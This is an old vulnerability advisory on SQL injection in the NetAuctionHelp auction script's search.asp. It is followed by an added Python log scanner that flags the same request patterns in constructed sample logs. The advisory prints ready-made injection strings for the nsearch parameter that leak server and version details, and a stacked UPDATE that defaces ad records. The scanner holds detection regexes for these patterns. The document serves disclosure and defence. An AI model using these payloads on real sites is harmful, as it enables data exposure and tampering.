Aria-Security.net: NetAuctionHelp SQL Injection

2007-11-22T00:00:00
ID SECURITYVULNS:DOC:18480
Type securityvulns
Reporter Securityvulns
Modified 2007-11-22T00:00:00

Description

Aria-Security Net Original Advisory @ http://aria-security.net/forum/showthread.php?p=1099


Vendor: http://www.netauctionhelp.com

PoC:
search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=[SQL INJECTION]
search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch='having 1=1--
search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@servername)--
search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@version)--

tblAd.id tblAd.aspectratio tblAd.title tblAd.imagepath tblAd.startdate tblAd.enddate tblAd.id_seller tblAd.descr

-1' UPDATE tblAd set descr= 'HACKED' Where(ID= '1');--

This code will update itemdetl.asp?id=1

Credit goes to Aria-Security.Net Greetz: AurA
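
A log check for the request patterns shown in the PoC, as an added example that is not part of the original advisory or the vendor's code. It assumes a simplified access-log layout (method, path, query string, client IP, status); the sample lines, status codes and rule names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample log lines: method, path, query, client IP, status.
SAMPLE_LOG = """\
GET /search.asp sort=ni&category=&categoryname=&kwsearch=&nsearch=antique+clock 203.0.113.5 200
GET /search.asp sort=ni&category=&categoryname=&kwsearch=&nsearch=%27having+1%3D1-- 203.0.113.9 500
GET /search.asp sort=ni&category=&categoryname=&kwsearch=&nsearch=1%27+or+1%3Dconvert(int,@@version)-- 203.0.113.9 500
GET /itemdetl.asp id=1 203.0.113.5 200
GET /search.asp sort=ni&nsearch=-1%27+UPDATE+tblAd+set+descr%3D+%27x%27+Where(ID%3D+%271%27)%3B-- 203.0.113.9 200
"""

# Rule names are hypothetical labels; each pattern mirrors one PoC form above.
RULES = [
    ("having-enum", re.compile(r"'\s*having\s+1\s*=\s*1", re.I)),
    ("convert-error-leak", re.compile(r"convert\s*\(\s*int\s*,\s*@@\w+", re.I)),
    ("stacked-write", re.compile(r"'\s*(update|insert|delete|drop)\s", re.I)),
]

def scan(log_text):
    """Return (client_ip, path, param, rule, status) for each flagged parameter."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 5:
            continue  # skip lines that do not match the assumed layout
        _method, path, query, ip, status = fields
        # parse_qsl URL-decodes %XX and '+' so rules see the value the app saw
        for name, value in parse_qsl(query, keep_blank_values=True):
            for rule, rx in RULES:
                if rx.search(value):
                    hits.append((ip, path, name, rule, int(status)))
    return hits

def by_client(hits):
    """Group triggered rule names per client IP to show probing sequences."""
    out = {}
    for ip, _path, _param, rule, _status in hits:
        out.setdefault(ip, set()).add(rule)
    return out

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A single client triggering several rules against the same parameter is a stronger signal than any one match; the fix itself belongs in search.asp, where nsearch should reach the database only as a bound parameter.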